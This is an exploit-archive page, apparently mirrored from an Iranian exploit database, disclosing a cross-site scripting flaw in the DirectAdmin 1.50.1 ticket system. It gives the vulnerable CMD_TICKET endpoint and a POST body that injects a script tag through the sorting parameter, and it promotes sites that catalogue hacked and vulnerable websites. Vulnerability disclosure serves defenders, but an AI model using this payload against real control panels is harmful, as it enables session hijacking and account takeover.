Home / os / winxp

Directadmin ControlPanel 1.50.1 Message System Xss Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Directadmin ControlPanel 1.50.1 (Message System) Xss Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # Directadmin ControlPanel 1.50.1 (Message System) Xss Vulnerability # Directadmin Version : 1.50.1 And Old Version - Message System Page # Testet On : Centos 6 - Directadmin 1.50.1 # Vendor site : http://www.directadmin.com # Pic : http://iedb.ir/img/bug-directadmin-2-iedb.ir.jpg # Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67) # Site : IeDb.Ir - irist.ir - xssed.Ir # Iedb Telegram : https://telegram.me/iedbteam # Archive Exploit = http://iedb.ir/exploits-6582.html ##################################### Description : A client side cross site scripting vulnerability is detected on DirectAdmins Management Web-Application. The exploit, to allow the user to execute a script. The bug, on page Message System to view Ticket. Bug : http://ip:2222/CMD_TICKET Select Ticket And Delete.Xss In Post Method For This Page. http://ip:2222/CMD_TICKET POST : select2=0000000100&delete=Delete+Selected&action=multiple&sorting=sort1%3D-1'"><script>alert(/IrIsT.Ir/)</script> Pic For This Bug : http://iedb.ir/img/bug-directadmin-2-iedb.ir.jpg ##################################### ** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team ** http://irist.ir ==>> Register hacked sites ** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site) Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb, Khashayar,B3hz4d4,Shabgard,Cl09er,Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team ##################################### # Archive Exploit = http://iedb.ir/exploits-6582.html #####################################</BODY></HTML>

 

TOP